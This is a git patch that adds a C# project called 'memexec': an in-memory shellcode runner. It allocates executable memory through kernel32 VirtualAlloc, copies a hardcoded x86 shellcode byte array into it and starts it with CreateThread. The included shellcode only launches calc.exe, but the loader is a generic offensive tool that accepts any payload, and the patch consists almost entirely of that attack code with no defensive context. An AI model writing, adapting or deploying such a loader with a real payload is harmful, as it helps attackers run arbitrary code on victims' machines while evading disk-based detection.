From dc5b3be9a7d36e84bfa61907c170ff5772b95328 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Sivert=20V=2E=20S=C3=A6ther?= Date: Wed, 11 Dec 2024 20:17:51 +0100 Subject: [PATCH] batman --- .gitignore | 2 ++ Program.cs | 16 ++++++++++++++++ Shells.cs | 7 +++++++ Win.cs | 15 +++++++++++++++ memexec.csproj | 10 ++++++++++ memexec.sln | 22 ++++++++++++++++++++++ 6 files changed, 72 insertions(+) create mode 100644 .gitignore create mode 100644 Program.cs create mode 100644 Shells.cs create mode 100644 Win.cs create mode 100644 memexec.csproj create mode 100644 memexec.sln diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..c6e49ef --- /dev/null +++ b/.gitignore @@ -0,0 +1,2 @@ +obj/ +bin/ diff --git a/Program.cs b/Program.cs new file mode 100644 index 0000000..ad5a779 --- /dev/null +++ b/Program.cs @@ -0,0 +1,16 @@ +using System; +using System.Diagnostics; +using System.Runtime.InteropServices; +using memexec; + +Trace.Listeners.Add(new TextWriterTraceListener(Console.Out)); + +Debug.WriteLine("Prepping shellcode"); +Byte[] buf = Shells.Calc; +IntPtr addr = Win.VirtualAlloc(0, (uint)buf.Length, 0x3000, 0x40); +Marshal.Copy(buf, 0, addr, buf.Length); +IntPtr handle = Win.CreateThread(0, 0, addr, 0, 0, 0); +Debug.WriteLine("Execing shellcode"); +if (Win.WaitForSingleObject(handle, 0xFFFFFFFF) != 0) { + Debug.WriteLine("Unable to join thread!"); +} diff --git a/Shells.cs b/Shells.cs new file mode 100644 index 0000000..13d09b6 --- /dev/null +++ b/Shells.cs @@ -0,0 +1,7 @@ + +namespace memexec; + +public class Shells +{ + public static Byte[] Calc = [ 0x31, 0xc9, 0x51, 0x68, 0x2e, 0x65, 0x78, 0x65, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x89, 0xe0, 0x41, 0x51, 0x50, 0xbb, 0xfd, 0xe5, 0xf0, 0x76, 0xff, 0xd3, 0x31, 0xc0, 0x50, 0xb8, 0x4f, 0x21, 0xed, 0x76, 0xff, 0xe0 ]; +} diff --git a/Win.cs b/Win.cs new file mode 100644 index 0000000..9c6a80a --- /dev/null +++ b/Win.cs @@ -0,0 +1,15 @@ +using System.Runtime.InteropServices; + +namespace memexec; + +public class Win +{ + [DllImport("kernel32")] + public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); + + [DllImport("kernel32.dll", SetLastError=true)] + public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); + + [DllImport("kernel32", CharSet=CharSet.Ansi)] + public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); +} diff --git a/memexec.csproj b/memexec.csproj new file mode 100644 index 0000000..fd4bd08 --- /dev/null +++ b/memexec.csproj @@ -0,0 +1,10 @@ + + + + Exe + net9.0 + enable + enable + + + diff --git a/memexec.sln b/memexec.sln new file mode 100644 index 0000000..0b82b11 --- /dev/null +++ b/memexec.sln @@ -0,0 +1,22 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 17 +VisualStudioVersion = 17.0.31903.59 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "memexec", "memexec.csproj", "{4DE2DA8B-145E-41A8-952E-3EBE9E78BDEE}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {4DE2DA8B-145E-41A8-952E-3EBE9E78BDEE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {4DE2DA8B-145E-41A8-952E-3EBE9E78BDEE}.Debug|Any CPU.Build.0 = Debug|Any CPU + {4DE2DA8B-145E-41A8-952E-3EBE9E78BDEE}.Release|Any CPU.ActiveCfg = Release|Any CPU + {4DE2DA8B-145E-41A8-952E-3EBE9E78BDEE}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection +EndGlobal